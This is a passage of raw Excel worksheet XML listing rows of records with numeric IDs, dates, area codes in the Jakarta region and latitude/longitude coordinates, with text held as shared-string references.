        <v>3216</v>
      </c>
      <c r="P794">
        <v>32</v>
      </c>
      <c r="Q794" t="s">
        <v>334</v>
      </c>
      <c r="R794" t="s">
        <v>335</v>
      </c>
      <c r="S794" t="s">
        <v>41</v>
      </c>
      <c r="T794" t="s">
        <v>42</v>
      </c>
      <c r="U794" s="5">
        <v>10701720</v>
      </c>
      <c r="V794" s="5" t="s">
        <v>15189</v>
      </c>
      <c r="W794" s="5">
        <v>-617634</v>
      </c>
      <c r="X794" t="s">
        <v>18988</v>
      </c>
      <c r="Y794" t="str">
        <f t="shared" si="12"/>
        <v>-6.17634,107.01720</v>
      </c>
    </row>
    <row r="795" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A795">
        <v>108365</v>
      </c>
      <c r="B795" s="1">
        <v>43883</v>
      </c>
      <c r="C795">
        <v>1</v>
      </c>
      <c r="D795" t="s">
        <v>22</v>
      </c>
      <c r="E795" t="s">
        <v>23</v>
      </c>
      <c r="F795" t="s">
        <v>3176</v>
      </c>
      <c r="H795" t="s">
        <v>26</v>
      </c>
      <c r="I795" t="s">
        <v>76</v>
      </c>
      <c r="J795" t="s">
        <v>3177</v>
      </c>
      <c r="L795" t="s">
        <v>3178</v>
      </c>
      <c r="M795">
        <v>3175050002</v>
      </c>
      <c r="N795">
        <v>3175050</v>
      </c>
      <c r="O795">
        <v>3175</v>
      </c>
      <c r="P795">
        <v>31</v>
      </c>
      <c r="Q795" t="s">
        <v>1012</v>
      </c>
      <c r="R795" t="s">
        <v>1013</v>
      </c>
      <c r="S795" t="s">
        <v>547</v>
      </c>
      <c r="T795" t="s">
        <v>33</v>
      </c>
      <c r="U795" s="5">
        <v>10690669</v>
      </c>
      <c r="V795" s="5" t="s">
        <v>15190</v>
      </c>
      <c r="W795" s="5">
        <v>-616442</v>
      </c>
      <c r="X795" t="s">
        <v>18989</v>
      </c>
      <c r="Y795" t="str">
        <f t="shared" si="12"/>
        <v>-6.16442,106.90669</v>
      </c>
    </row>
    <row r="796" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A796">
        <v>108366</v>
      </c>
      <c r="B796" s="1">
        <v>43883</v>
      </c>
      <c r="C796">
        <v>1</v>
      </c>
      <c r="D796" t="s">
        <v>22</v>
      </c>
      <c r="E796" t="s">
        <v>23</v>
      </c>
      <c r="F796" t="s">
        <v>3179</v>
      </c>
      <c r="H796" t="s">
        <v>26</v>
      </c>
      <c r="I796" t="s">
        <v>898</v>
      </c>
      <c r="J796" t="s">
        <v>3180</v>
      </c>
      <c r="L796" t="s">
        <v>3181</v>
      </c>
      <c r="M796">
        <v>3172060008</v>
      </c>
      <c r="N796">
        <v>3172060</v>
      </c>
      <c r="O796">
        <v>3172</v>
      </c>
      <c r="P796">
        <v>31</v>
      </c>
      <c r="Q796" t="s">
        <v>1096</v>
      </c>
      <c r="R796" t="s">
        <v>48</v>
      </c>
      <c r="S796" t="s">
        <v>49</v>
      </c>
      <c r="T796" t="s">
        <v>33</v>
      </c>
      <c r="U796" s="5">
        <v>10685825</v>
      </c>
      <c r="V796" s="5" t="s">
        <v>15191</v>
      </c>
      <c r="W796" s="5">
        <v>-621458</v>
      </c>
      <c r="X796" t="s">
        <v>18990</v>
      </c>
      <c r="Y796" t="str">
        <f t="shared" si="12"/>
        <v>-6.21458,106.85825</v>
      </c>
    </row>
    <row r="797" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A797">
        <v>108367</v>
      </c>
      <c r="B797" s="1">
        <v>43883</v>
      </c>
      <c r="C797">
        <v>1</v>
      </c>
      <c r="D797" t="s">
        <v>22</v>
      </c>
      <c r="E797" t="s">
        <v>23</v>
      </c>
      <c r="F797" t="s">
        <v>3182</v>
      </c>
      <c r="G797" t="s">
        <v>3183</v>
      </c>
      <c r="H797" t="s">
        <v>26</v>
      </c>
      <c r="I797" t="s">
        <v>1201</v>
      </c>
      <c r="J797" t="s">
        <v>3184</v>
      </c>
      <c r="L797" t="s">
        <v>3185</v>
      </c>
      <c r="M797">
        <v>3172070007</v>
      </c>
      <c r="N797">
        <v>3172070</v>
      </c>
      <c r="O797">
        <v>3172</v>
      </c>
      <c r="P797">
        <v>31</v>
      </c>
      <c r="Q797" t="s">
        <v>3186</v>
      </c>
      <c r="R797" t="s">
        <v>128</v>
      </c>
      <c r="S797" t="s">
        <v>49</v>
      </c>
      <c r="T797" t="s">
        <v>33</v>
      </c>
      <c r="U797" s="5">
        <v>10690328</v>
      </c>
      <c r="V797" s="5" t="s">
        <v>15192</v>
      </c>
      <c r="W797" s="5">
        <v>-621759</v>
      </c>
      <c r="X797" t="s">
        <v>18991</v>
      </c>
      <c r="Y797" t="str">
        <f t="shared" si="12"/>
        <v>-6.21759,106.90328</v>
      </c>
    </row>
    <row r="798" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A798">
        <v>108368</v>
      </c>
      <c r="B798" s="1">
        <v>43883</v>
      </c>
      <c r="C798">
        <v>1</v>
      </c>
      <c r="D798" t="s">
        <v>22</v>
      </c>
      <c r="E798" t="s">
        <v>23</v>
      </c>
      <c r="F798" t="s">
        <v>3187</v>
      </c>
      <c r="G798" t="s">
        <v>3188</v>
      </c>
      <c r="H798" t="s">
        <v>26</v>
      </c>
      <c r="I798" t="s">
        <v>271</v>
      </c>
      <c r="J798" t="s">
        <v>3189</v>
      </c>
      <c r="L798" t="s">
        <v>3190</v>
      </c>
      <c r="M798">
        <v>3171090003</v>
      </c>
      <c r="N798">
        <v>3171090</v>
      </c>
      <c r="O798">
        <v>3171</v>
      </c>
      <c r="P798">
        <v>31</v>
      </c>
      <c r="Q798" t="s">
        <v>3154</v>
      </c>
      <c r="R798" t="s">
        <v>347</v>
      </c>
      <c r="S798" t="s">
        <v>108</v>
      </c>
      <c r="T798" t="s">
        <v>33</v>
      </c>
      <c r="U798" s="5">
        <v>10685286</v>
      </c>
      <c r="V798" s="5" t="s">
        <v>15193</v>
      </c>
      <c r="W798" s="5">
        <v>-622705</v>
      </c>
      <c r="X798" t="s">
        <v>18992</v>
      </c>
      <c r="Y798" t="str">
        <f t="shared" si="12"/>
        <v>-6.22705,106.85286</v>
      </c>
    </row>
    <row r="799" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A799">
        <v>108369</v>
      </c>
      <c r="B799" s="1">
        <v>43883</v>
      </c>
      <c r="C799">
        <v>1</v>
      </c>
      <c r="D799" t="s">
        <v>22</v>
      </c>
      <c r="E799" t="s">
        <v>23</v>
      </c>
      <c r="F799" t="s">
        <v>3191</v>
      </c>
      <c r="H799" t="s">
        <v>26</v>
      </c>
      <c r="I799" t="s">
        <v>974</v>
      </c>
      <c r="J799" t="s">
        <v>2627</v>
      </c>
      <c r="L799" t="s">
        <v>3192</v>
      </c>
      <c r="M799">
        <v>3216100002</v>
      </c>
      <c r="N799">
        <v>3216100</v>
      </c>
      <c r="O799">
        <v>3216</v>
      </c>
      <c r="P799">
        <v>32</v>
      </c>
      <c r="Q799" t="s">
        <v>3193</v>
      </c>
      <c r="R799" t="s">
        <v>940</v>
      </c>
      <c r="S799" t="s">
        <v>41</v>
      </c>
      <c r="T799" t="s">
        <v>42</v>
      </c>
      <c r="U799" s="5">
        <v>10699066</v>
      </c>
      <c r="V799" s="5" t="s">
        <v>15194</v>
      </c>
      <c r="W799" s="5">
        <v>-616673</v>
      </c>
      <c r="X799" t="s">
        <v>18993</v>
      </c>
      <c r="Y799" t="str">
        <f t="shared" si="12"/>
        <v>-6.16673,106.99066</v>
      </c>
    </row>
    <row r="800" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A800">
        <v>108370</v>
      </c>
      <c r="B800" s="1">
        <v>43883</v>
      </c>
      <c r="C800">
        <v>1</v>
      </c>
      <c r="D800" t="s">
        <v>22</v>
      </c>
      <c r="E800" t="s">
        <v>23</v>
      </c>
      <c r="F800" t="s">
        <v>3194</v>
      </c>
      <c r="G800" t="s">
        <v>3195</v>
      </c>
      <c r="H800" t="s">
        <v>26</v>
      </c>
      <c r="I800" t="s">
        <v>1359</v>
      </c>
      <c r="J800" t="s">
        <v>3196</v>
      </c>
      <c r="L800" t="s">
        <v>3197</v>
      </c>
      <c r="M800">
        <v>3172060002</v>
      </c>
      <c r="N800">
        <v>3172060</v>
      </c>
      <c r="O800">
        <v>3172</v>
      </c>
      <c r="P800">
        <v>31</v>
      </c>
      <c r="Q800" t="s">
        <v>1025</v>
      </c>
      <c r="R800" t="s">
        <v>48</v>
      </c>
      <c r="S800" t="s">
        <v>49</v>
      </c>
      <c r="T800" t="s">
        <v>33</v>
      </c>
      <c r="U800" s="5">
        <v>10687498</v>
      </c>
      <c r="V800" s="5" t="s">
        <v>15195</v>
      </c>
      <c r="W800" s="5">
        <v>-623417</v>
      </c>
      <c r="X800" t="s">
        <v>18994</v>
      </c>
      <c r="Y800" t="str">
        <f t="shared" si="12"/>
        <v>-6.23417,106.87498</v>
      </c>
    </row>
    <row r="801" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A801">
        <v>108371</v>
      </c>
      <c r="B801" s="1">
        <v>43883</v>
      </c>
      <c r="C801">
        <v>1</v>
      </c>
      <c r="D801" t="s">
        <v>22</v>
      </c>
      <c r="E801" t="s">
        <v>23</v>
      </c>
      <c r="F801" t="s">
        <v>3198</v>
      </c>
      <c r="H801" t="s">
        <v>26</v>
      </c>
      <c r="I801" t="s">
        <v>197</v>
      </c>
      <c r="J801" t="s">
        <v>3199</v>
      </c>
      <c r="L801" t="s">
        <v>3200</v>
      </c>
      <c r="M801">
        <v>3172070001</v>
      </c>
      <c r="N801">
        <v>3172070</v>
      </c>
      <c r="O801">
        <v>3172</v>
      </c>
      <c r="P801">
        <v>31</v>
      </c>
      <c r="Q801" t="s">
        <v>127</v>
      </c>
      <c r="R801" t="s">
        <v>128</v>
      </c>
      <c r="S801" t="s">
        <v>49</v>
      </c>
      <c r="T801" t="s">
        <v>33</v>
      </c>
      <c r="U801" s="5">
        <v>10690460</v>
      </c>
      <c r="V801" s="5" t="s">
        <v>15196</v>
      </c>
      <c r="W801" s="5">
        <v>-623378</v>
      </c>
      <c r="X801" t="s">
        <v>18995</v>
      </c>
      <c r="Y801" t="str">
        <f t="shared" si="12"/>
        <v>-6.23378,106.90460</v>
      </c>
    </row>
    <row r="802" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A802">
        <v>108372</v>
      </c>
      <c r="B802" s="1">
        <v>43883</v>
      </c>
      <c r="C802">
        <v>1</v>
      </c>
      <c r="D802" t="s">
        <v>22</v>
      </c>
      <c r="E802" t="s">
        <v>23</v>
      </c>
      <c r="F802" t="s">
        <v>3201</v>
      </c>
      <c r="G802" t="s">
        <v>3202</v>
      </c>
      <c r="H802" t="s">
        <v>26</v>
      </c>
      <c r="I802" t="s">
        <v>1447</v>
      </c>
      <c r="J802" t="s">
        <v>3105</v>
      </c>
      <c r="L802" t="s">
        <v>3203</v>
      </c>
      <c r="M802">
        <v>3172100005</v>
      </c>
      <c r="N802">
        <v>3172100</v>
      </c>
      <c r="O802">
        <v>3172</v>
      </c>
      <c r="P802">
        <v>31</v>
      </c>
      <c r="Q802" t="s">
        <v>1773</v>
      </c>
      <c r="R802" t="s">
        <v>1436</v>
      </c>
      <c r="S802" t="s">
        <v>49</v>
      </c>
      <c r="T802" t="s">
        <v>33</v>
      </c>
      <c r="U802" s="5">
        <v>10686631</v>
      </c>
      <c r="V802" s="5" t="s">
        <v>15197</v>
      </c>
      <c r="W802" s="5">
        <v>-619982</v>
      </c>
      <c r="X802" t="s">
        <v>18996</v>
      </c>
      <c r="Y802" t="str">
        <f t="shared" si="12"/>
        <v>-6.19982,106.86631</v>
      </c>
    </row>
    <row r="803" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A803">
        <v>108373</v>
      </c>
      <c r="B803" s="1">
        <v>43883</v>
      </c>
      <c r="C803">
        <v>1</v>
      </c>
      <c r="D803" t="s">
        <v>22</v>
      </c>
      <c r="E803" t="s">
        <v>23</v>
      </c>
      <c r="F803" t="s">
        <v>3204</v>
      </c>
      <c r="G803" t="s">
        <v>3205</v>
      </c>
      <c r="H803" t="s">
        <v>26</v>
      </c>
      <c r="I803" t="s">
        <v>555</v>
      </c>
      <c r="J803" t="s">
        <v>3105</v>
      </c>
      <c r="M803">
        <v>3172100005</v>
      </c>
      <c r="N803">
        <v>3172100</v>
      </c>
      <c r="O803">
        <v>3172</v>
      </c>
      <c r="P803">
        <v>31</v>
      </c>
      <c r="Q803" t="s">
        <v>1773</v>
      </c>
      <c r="R803" t="s">
        <v>1436</v>
      </c>
      <c r="S803" t="s">
        <v>49</v>
      </c>
      <c r="T803" t="s">
        <v>33</v>
      </c>
      <c r="U803" s="5">
        <v>10686553</v>
      </c>
      <c r="V803" s="5" t="s">
        <v>15198</v>
      </c>
      <c r="W803" s="5">
        <v>-619901</v>
      </c>
      <c r="X803" t="s">
        <v>18997</v>
      </c>
      <c r="Y803" t="str">
        <f t="shared" si="12"/>
        <v>-6.19901,106.86553</v>
      </c>
    </row>
    <row r="804" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A804">
        <v>108374</v>
      </c>
      <c r="B804" s="1">
        <v>43883</v>
      </c>
      <c r="C804">
        <v>1</v>
      </c>
      <c r="D804" t="s">
        <v>22</v>
      </c>
      <c r="E804" t="s">
        <v>23</v>
      </c>
      <c r="F804" t="s">
        <v>3206</v>
      </c>
      <c r="G804" t="s">
        <v>3207</v>
      </c>
      <c r="H804" t="s">
        <v>26</v>
      </c>
      <c r="I804" t="s">
        <v>197</v>
      </c>
      <c r="J804" t="s">
        <v>2627</v>
      </c>
      <c r="L804" t="s">
        <v>3208</v>
      </c>
      <c r="M804">
        <v>3275061004</v>
      </c>
      <c r="N804">
        <v>3275061</v>
      </c>
      <c r="O804">
        <v>3275</v>
      </c>
      <c r="P804">
        <v>32</v>
      </c>
      <c r="Q804" t="s">
        <v>39</v>
      </c>
      <c r="R804" t="s">
        <v>40</v>
      </c>
      <c r="S804" t="s">
        <v>41</v>
      </c>
      <c r="T804" t="s">
        <v>42</v>
      </c>
      <c r="U804" s="5">
        <v>10698060</v>
      </c>
      <c r="V804" s="5" t="s">
        <v>15199</v>
      </c>
      <c r="W804" s="5">
        <v>-617914</v>
      </c>
      <c r="X804" t="s">
        <v>18998</v>
      </c>
      <c r="Y804" t="str">
        <f t="shared" si="12"/>
        <v>-6.17914,106.98060</v>
      </c>
    </row>
    <row r="805" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A805">
        <v>108375</v>
      </c>
      <c r="B805" s="1">
        <v>43883</v>
      </c>
      <c r="C805">
        <v>1</v>
      </c>
      <c r="D805" t="s">
        <v>22</v>
      </c>
      <c r="E805" t="s">
        <v>23</v>
      </c>
      <c r="F805" t="s">
        <v>3209</v>
      </c>
      <c r="G805" t="s">
        <v>3210</v>
      </c>
      <c r="H805" t="s">
        <v>26</v>
      </c>
      <c r="I805" t="s">
        <v>3211</v>
      </c>
      <c r="J805" t="s">
        <v>3212</v>
      </c>
      <c r="L805" t="s">
        <v>3213</v>
      </c>
      <c r="M805">
        <v>3173050003</v>
      </c>
      <c r="N805">
        <v>3173050</v>
      </c>
      <c r="O805">
        <v>3173</v>
      </c>
      <c r="P805">
        <v>31</v>
      </c>
      <c r="Q805" t="s">
        <v>2333</v>
      </c>
      <c r="R805" t="s">
        <v>589</v>
      </c>
      <c r="S805" t="s">
        <v>62</v>
      </c>
      <c r="T805" t="s">
        <v>33</v>
      </c>
      <c r="U805" s="5">
        <v>10686645</v>
      </c>
      <c r="V805" s="5" t="s">
        <v>15170</v>
      </c>
      <c r="W805" s="5">
        <v>-618182</v>
      </c>
      <c r="X805" t="s">
        <v>18999</v>
      </c>
      <c r="Y805" t="str">
        <f t="shared" si="12"/>
        <v>-6.18182,106.86645</v>
      </c>
    </row>
    <row r="806" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A806">
        <v>108376</v>
      </c>
      <c r="B806" s="1">
        <v>43883</v>
      </c>
      <c r="C806">
        <v>1</v>
      </c>
      <c r="D806" t="s">
        <v>22</v>
      </c>
      <c r="E806" t="s">
        <v>23</v>
      </c>
      <c r="F806" t="s">
        <v>3214</v>
      </c>
      <c r="H806" t="s">
        <v>26</v>
      </c>
      <c r="I806" t="s">
        <v>137</v>
      </c>
      <c r="J806" t="s">
        <v>3215</v>
      </c>
      <c r="L806" t="s">
        <v>3216</v>
      </c>
      <c r="M806">
        <v>3173060007</v>
      </c>
      <c r="N806">
        <v>3173060</v>
      </c>
      <c r="O806">
        <v>3173</v>
      </c>
      <c r="P806">
        <v>31</v>
      </c>
      <c r="Q806" t="s">
        <v>61</v>
      </c>
      <c r="R806" t="s">
        <v>61</v>
      </c>
      <c r="S806" t="s">
        <v>62</v>
      </c>
      <c r="T806" t="s">
        <v>33</v>
      </c>
      <c r="U806" s="5">
        <v>10684389</v>
      </c>
      <c r="V806" s="5" t="s">
        <v>15200</v>
      </c>
      <c r="W806" s="5">
        <v>-616762</v>
      </c>
      <c r="X806" t="s">
        <v>19000</v>
      </c>
      <c r="Y806" t="str">
        <f t="shared" si="12"/>
        <v>-6.16762,106.84389</v>
      </c>
    </row>
    <row r="807" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A807">
        <v>108377</v>
      </c>
      <c r="B807" s="1">
        <v>43883</v>
      </c>
      <c r="C807">
        <v>1</v>
      </c>
      <c r="D807" t="s">
        <v>22</v>
      </c>
      <c r="E807" t="s">
        <v>23</v>
      </c>
      <c r="F807" t="s">
        <v>3217</v>
      </c>
      <c r="G807" t="s">
        <v>3218</v>
      </c>
      <c r="H807" t="s">
        <v>26</v>
      </c>
      <c r="I807" t="s">
        <v>517</v>
      </c>
      <c r="J807" t="s">
        <v>3219</v>
      </c>
      <c r="M807">
        <v>3172090002</v>
      </c>
      <c r="N807">
        <v>3172090</v>
      </c>
      <c r="O807">
        <v>3172</v>
      </c>
      <c r="P807">
        <v>31</v>
      </c>
      <c r="Q807" t="s">
        <v>2931</v>
      </c>
      <c r="R807" t="s">
        <v>890</v>
      </c>
      <c r="S807" t="s">
        <v>49</v>
      </c>
      <c r="T807" t="s">
        <v>33</v>
      </c>
      <c r="U807" s="5">
        <v>10689388</v>
      </c>
      <c r="V807" s="5" t="s">
        <v>15201</v>
      </c>
      <c r="W807" s="5">
        <v>-621315</v>
      </c>
      <c r="X807" t="s">
        <v>19001</v>
      </c>
      <c r="Y807" t="str">
        <f t="shared" si="12"/>
        <v>-6.21315,106.89388</v>
      </c>
    </row>
    <row r="808" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A808">
        <v>108378</v>
      </c>
      <c r="B808" s="1">
        <v>43883</v>
      </c>
      <c r="C808">
        <v>1</v>
      </c>
      <c r="D808" t="s">
        <v>22</v>
      </c>
      <c r="E808" t="s">
        <v>23</v>
      </c>
      <c r="F808" t="s">
        <v>3220</v>
      </c>
      <c r="G808" t="s">
        <v>3221</v>
      </c>
      <c r="H808" t="s">
        <v>26</v>
      </c>
      <c r="I808" t="s">
        <v>166</v>
      </c>
      <c r="J808" t="s">
        <v>3222</v>
      </c>
      <c r="L808" t="s">
        <v>3223</v>
      </c>
      <c r="M808">
        <v>3173030003</v>
      </c>
      <c r="N808">
        <v>3173030</v>
      </c>
      <c r="O808">
        <v>3173</v>
      </c>
      <c r="P808">
        <v>31</v>
      </c>
      <c r="Q808" t="s">
        <v>3224</v>
      </c>
      <c r="R808" t="s">
        <v>3128</v>
      </c>
      <c r="S808" t="s">
        <v>62</v>
      </c>
      <c r="T808" t="s">
        <v>33</v>
      </c>
      <c r="U808" s="5">
        <v>10684790</v>
      </c>
      <c r="V808" s="5" t="s">
        <v>15202</v>
      </c>
      <c r="W808" s="5">
        <v>-618540</v>
      </c>
      <c r="X808" t="s">
        <v>19002</v>
      </c>
      <c r="Y808" t="str">
        <f t="shared" si="12"/>
        <v>-6.18540,106.84790</v>
      </c>
    </row>
    <row r="809" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A809">
        <v>108379</v>
      </c>
      <c r="B809" s="1">
        <v>43883</v>
      </c>
      <c r="C809">
        <v>1</v>
      </c>
      <c r="D809" t="s">
        <v>22</v>
      </c>
      <c r="E809" t="s">
        <v>23</v>
      </c>
      <c r="F809" t="s">
        <v>3225</v>
      </c>
      <c r="H809" t="s">
        <v>26</v>
      </c>
      <c r="I809" t="s">
        <v>1909</v>
      </c>
      <c r="J809" t="s">
        <v>2494</v>
      </c>
      <c r="L809" t="s">
        <v>3226</v>
      </c>
      <c r="M809">
        <v>3175050001</v>
      </c>
      <c r="N809">
        <v>3175050</v>
      </c>
      <c r="O809">
        <v>3175</v>
      </c>
      <c r="P809">
        <v>31</v>
      </c>
      <c r="Q809" t="s">
        <v>1037</v>
      </c>
      <c r="R809" t="s">
        <v>1013</v>
      </c>
      <c r="S809" t="s">
        <v>547</v>
      </c>
      <c r="T809" t="s">
        <v>33</v>
      </c>
      <c r="U809" s="5">
        <v>10690845</v>
      </c>
      <c r="V809" s="5" t="s">
        <v>15203</v>
      </c>
      <c r="W809" s="5">
        <v>-614979</v>
      </c>
      <c r="X809" t="s">
        <v>19003</v>
      </c>
      <c r="Y809" t="str">
        <f t="shared" si="12"/>
        <v>-6.14979,106.90845</v>
      </c>
    </row>
    <row r="810" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A810">
        <v>108380</v>
      </c>
      <c r="B810" s="1">
        <v>43883</v>
      </c>
      <c r="C810">
        <v>1</v>
      </c>
      <c r="D810" t="s">
        <v>22</v>
      </c>
      <c r="E810" t="s">
        <v>23</v>
      </c>
      <c r="F810" t="s">
        <v>3227</v>
      </c>
      <c r="G810" t="s">
        <v>3228</v>
      </c>
      <c r="H810" t="s">
        <v>26</v>
      </c>
      <c r="I810" t="s">
        <v>76</v>
      </c>
      <c r="J810" t="s">
        <v>3229</v>
      </c>
      <c r="M810">
        <v>3175050002</v>
      </c>
      <c r="N810">
        <v>3175050</v>
      </c>
      <c r="O810">
        <v>3175</v>
      </c>
      <c r="P810">
        <v>31</v>
      </c>
      <c r="Q810" t="s">
        <v>1012</v>
      </c>
      <c r="R810" t="s">
        <v>1013</v>
      </c>
      <c r="S810" t="s">
        <v>547</v>
      </c>
      <c r="T810" t="s">
        <v>33</v>
      </c>
      <c r="U810" s="5">
        <v>10690431</v>
      </c>
      <c r="V810" s="5" t="s">
        <v>15204</v>
      </c>
      <c r="W810" s="5">
        <v>-616776</v>
      </c>
      <c r="X810" t="s">
        <v>19004</v>
      </c>
      <c r="Y810" t="str">
        <f t="shared" si="12"/>
        <v>-6.16776,106.90431</v>
      </c>
    </row>
    <row r="811" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A811">
        <v>108381</v>
      </c>
      <c r="B811" s="1">
        <v>43883</v>
      </c>
      <c r="C811">
        <v>1</v>
      </c>
      <c r="D811" t="s">
        <v>22</v>
      </c>
      <c r="E811" t="s">
        <v>23</v>
      </c>
      <c r="F811" t="s">
        <v>3230</v>
      </c>
      <c r="G811" t="s">
        <v>3231</v>
      </c>
      <c r="H811" t="s">
        <v>26</v>
      </c>
      <c r="I811" t="s">
        <v>166</v>
      </c>
      <c r="J811" t="s">
        <v>3232</v>
      </c>
      <c r="M811">
        <v>3172090001</v>
      </c>
      <c r="N811">
        <v>3172090</v>
      </c>
      <c r="O811">
        <v>3172</v>
      </c>
      <c r="P811">
        <v>31</v>
      </c>
      <c r="Q811" t="s">
        <v>2681</v>
      </c>
      <c r="R811" t="s">
        <v>890</v>
      </c>
      <c r="S811" t="s">
        <v>49</v>
      </c>
      <c r="T811" t="s">
        <v>33</v>
      </c>
      <c r="U811" s="5">
        <v>10687682</v>
      </c>
      <c r="V811" s="5" t="s">
        <v>15205</v>
      </c>
      <c r="W811" s="5">
        <v>-620902</v>
      </c>
      <c r="X811" t="s">
        <v>19005</v>
      </c>
      <c r="Y811" t="str">
        <f t="shared" si="12"/>
        <v>-6.20902,106.87682</v>
      </c>
    </row>
    <row r="812" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A812">
        <v>108382</v>
      </c>
      <c r="B812" s="1">
        <v>43883</v>
      </c>
      <c r="C812">
        <v>1</v>
      </c>
      <c r="D812" t="s">
        <v>22</v>
      </c>
      <c r="E812" t="s">
        <v>23</v>
      </c>
      <c r="F812" t="s">
        <v>3233</v>
      </c>
      <c r="G812" t="s">
        <v>3234</v>
      </c>
      <c r="H812" t="s">
        <v>26</v>
      </c>
      <c r="I812" t="s">
        <v>1359</v>
      </c>
      <c r="J812" t="s">
        <v>3235</v>
      </c>
      <c r="L812" t="s">
        <v>3236</v>
      </c>
      <c r="M812">
        <v>3172070001</v>
      </c>
      <c r="N812">
        <v>3172070</v>
      </c>
      <c r="O812">
        <v>3172</v>
      </c>
      <c r="P812">
        <v>31</v>
      </c>
      <c r="Q812" t="s">
        <v>127</v>
      </c>
      <c r="R812" t="s">
        <v>128</v>
      </c>
      <c r="S812" t="s">
        <v>49</v>
      </c>
      <c r="T812" t="s">
        <v>33</v>
      </c>
      <c r="U812" s="5">
        <v>10690349</v>
      </c>
      <c r="V812" s="5" t="s">
        <v>15206</v>
      </c>
      <c r="W812" s="5">
        <v>-624037</v>
      </c>
      <c r="X812" t="s">
        <v>19006</v>
      </c>
      <c r="Y812" t="str">
        <f t="shared" si="12"/>
        <v>-6.24037,106.90349</v>
      </c>
    </row>
    <row r="813" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A813">
        <v>108383</v>
      </c>
      <c r="B813" s="1">
        <v>43883</v>
      </c>
      <c r="C813">
        <v>1</v>
      </c>
      <c r="D813" t="s">
        <v>22</v>
      </c>
      <c r="E813" t="s">
        <v>23</v>
      </c>
      <c r="F813" t="s">
        <v>3237</v>
      </c>
      <c r="H813" t="s">
        <v>26</v>
      </c>
      <c r="I813" t="s">
        <v>1559</v>
      </c>
      <c r="J813" t="s">
        <v>2384</v>
      </c>
      <c r="L813" t="s">
        <v>3238</v>
      </c>
      <c r="M813">
        <v>3172090006</v>
      </c>
      <c r="N813">
        <v>3172090</v>
      </c>
      <c r="O813">
        <v>3172</v>
      </c>
      <c r="P813">
        <v>31</v>
      </c>
      <c r="Q813" t="s">
        <v>2283</v>
      </c>
      <c r="R813" t="s">
        <v>890</v>
      </c>
      <c r="S813" t="s">
        <v>49</v>
      </c>
      <c r="T813" t="s">
        <v>33</v>
      </c>
      <c r="U813" s="5">
        <v>10688249</v>
      </c>
      <c r="V813" s="5" t="s">
        <v>15207</v>
      </c>
      <c r="W813" s="5">
        <v>-618071</v>
      </c>
      <c r="X813" t="s">
        <v>19007</v>
      </c>
      <c r="Y813" t="str">
        <f t="shared" si="12"/>
        <v>-6.18071,106.88249</v>
      </c>
    </row>
    <row r="814" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A814">
        <v>108384</v>
      </c>
      <c r="B814" s="1">
        <v>43883</v>
      </c>
      <c r="C814">
        <v>1</v>
      </c>
      <c r="D814" t="s">
        <v>22</v>
      </c>
      <c r="E814" t="s">
        <v>23</v>
      </c>
      <c r="F814" t="s">
        <v>3239</v>
      </c>
      <c r="H814" t="s">
        <v>26</v>
      </c>
      <c r="I814" t="s">
        <v>137</v>
      </c>
      <c r="J814" t="s">
        <v>3240</v>
      </c>
      <c r="L814" t="s">
        <v>3241</v>
      </c>
      <c r="M814">
        <v>3172090002</v>
      </c>
      <c r="N814">
        <v>3172090</v>
      </c>
      <c r="O814">
        <v>3172</v>
      </c>
      <c r="P814">
        <v>31</v>
      </c>
      <c r="Q814" t="s">
        <v>2931</v>
      </c>
      <c r="R814" t="s">
        <v>890</v>
      </c>
      <c r="S814" t="s">
        <v>49</v>
      </c>
      <c r="T814" t="s">
        <v>33</v>
      </c>
      <c r="U814" s="5">
        <v>10689382</v>
      </c>
      <c r="V814" s="5" t="s">
        <v>15208</v>
      </c>
      <c r="W814" s="5">
        <v>-621171</v>
      </c>
      <c r="X814" t="s">
        <v>19008</v>
      </c>
      <c r="Y814" t="str">
        <f t="shared" si="12"/>
        <v>-6.21171,106.89382</v>
      </c>
    </row>
    <row r="815" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A815">
        <v>108385</v>
      </c>
      <c r="B815" s="1">
        <v>43883</v>
      </c>
      <c r="C815">
        <v>1</v>
      </c>
      <c r="D815" t="s">
        <v>22</v>
      </c>
      <c r="E815" t="s">
        <v>23</v>
      </c>
      <c r="F815" t="s">
        <v>3242</v>
      </c>
      <c r="H815" t="s">
        <v>26</v>
      </c>
      <c r="I815" t="s">
        <v>3243</v>
      </c>
      <c r="J815" t="s">
        <v>3244</v>
      </c>
      <c r="L815" t="s">
        <v>3245</v>
      </c>
      <c r="M815">
        <v>3171100003</v>
      </c>
      <c r="N815">
        <v>3171100</v>
      </c>
      <c r="O815">
        <v>3171</v>
      </c>
      <c r="P815">
        <v>31</v>
      </c>
      <c r="Q815" t="s">
        <v>3246</v>
      </c>
      <c r="R815" t="s">
        <v>107</v>
      </c>
      <c r="S815" t="s">
        <v>108</v>
      </c>
      <c r="T815" t="s">
        <v>33</v>
      </c>
      <c r="U815" s="5">
        <v>10682184</v>
      </c>
      <c r="V815" s="5" t="s">
        <v>15209</v>
      </c>
      <c r="W815" s="5">
        <v>-621831</v>
      </c>
      <c r="X815" t="s">
        <v>19009</v>
      </c>
      <c r="Y815" t="str">
        <f t="shared" si="12"/>
        <v>-6.21831,106.82184</v>
      </c>
    </row>
    <row r="816" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A816">
        <v>108386</v>
      </c>
      <c r="B816" s="1">
        <v>43883</v>
      </c>
      <c r="C816">
        <v>1</v>
      </c>
      <c r="D816" t="s">
        <v>22</v>
      </c>
      <c r="E816" t="s">
        <v>23</v>
      </c>
